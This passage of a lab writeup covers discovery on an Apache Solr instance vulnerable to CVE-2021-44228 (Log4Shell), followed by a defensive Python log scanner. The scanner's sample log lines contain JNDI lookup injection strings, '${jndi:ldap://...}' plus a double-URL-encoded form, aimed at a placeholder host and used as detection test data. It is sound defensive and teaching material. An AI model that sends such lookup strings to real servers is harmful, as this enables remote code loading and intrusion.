# Discovery

I explored the web interface accessible at **`http://10.10.75.171:8983`** and clicked around to get a feel for the application. For more detail on Apache Solr, refer to the official website: <https://solr.apache.org/>

![http://10.10.75.171:8983](https://2022164620-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtzurpgroDJSMn9AFVmQP%2Fuploads%2Fzfn24dE0WTMG4UegrA57%2FDiscovery1.PNG?alt=media\&token=474496be-04f8-446f-a6a5-b6402fa01683)

This instance of Apache Solr is provisioned with no data whatsoever. It is a flat, vanilla, absolute minimum installation -- yet at its core it is still vulnerable to CVE-2021-44228.

When navigating to [**`http://10.10.75.171:8983`**](http://10.10.75.171:8983/), I could see clear indicators that log4j is in use within the application for logging activity. The **`-Dsolr.log.dir`** argument was set to `/var/solr/logs`.

![solr logs](https://2022164620-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtzurpgroDJSMn9AFVmQP%2Fuploads%2FJeCZ0MbKyyLf3GGmVYsJ%2Fsolr%20logs.PNG?alt=media\&token=88fb9f0e-21e2-40de-b692-5eca39d9599f)

The path (URL endpoint) indicated in these repeated entries is **`/admin/cores`**.

I also gathered from these log entries that there are some data points I could control as a user. The `params={}` field gave that away.
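The same two log fields seen from the defender's side, as an added example that is not part of the original writeup: a scanner that reads Solr request-log lines and flags any entry whose `path` or `params` value carries Log4j lookup syntax (`${`), including URL-encoded forms. The log lines are constructed samples in the layout shown in the screenshot, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# The two user-influenced fields the writeup points at: path=... and params={...}
REQUEST_RE = re.compile(
    r"path=(?P<path>\S+)\s+params=\{(?P<params>.*)\}\s+status=(?P<status>-?\d+)")
# Match the lookup opener "${" rather than one specific prefix, so nested
# lookups used to hide the prefix are still flagged.
LOOKUP_RE = re.compile(r"\$\{")

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so %24%7B and double-encoded forms are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return a finding dict if a request line carries lookup syntax, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None  # not a request-log line
    hits = [f for f in ("path", "params")
            if LOOKUP_RE.search(decode_fully(m.group(f)))]
    if not hits:
        return None
    return {"path": m.group("path"), "fields": hits,
            "status": int(m.group("status"))}

def scan_log(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for f in map(scan_line, lines) if f]

# Constructed sample lines (not taken from the target's real log file)
PREFIX = "2021-12-13 03:47:5{} INFO  (qtp1-21) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null "
SAMPLE_LOG = [
    PREFIX.format(1) + "path=/admin/cores params={} status=0 QTime=0",
    PREFIX.format(2) + "path=/admin/cores params={action=STATUS&wt=json} status=0 QTime=1",
    PREFIX.format(3) + "path=/admin/cores params={foo=${jndi:ldap://example.invalid/x}} status=0 QTime=0",
    PREFIX.format(4) + "path=/admin/cores params={foo=%2524%257Bjndi:ldap://example.invalid/x%257D} status=0 QTime=0",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

On a real host the input would be the files under the directory named by `-Dsolr.log.dir`; a hit only shows that lookup syntax reached the logger, so it should be correlated with outbound connections from the Solr process.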
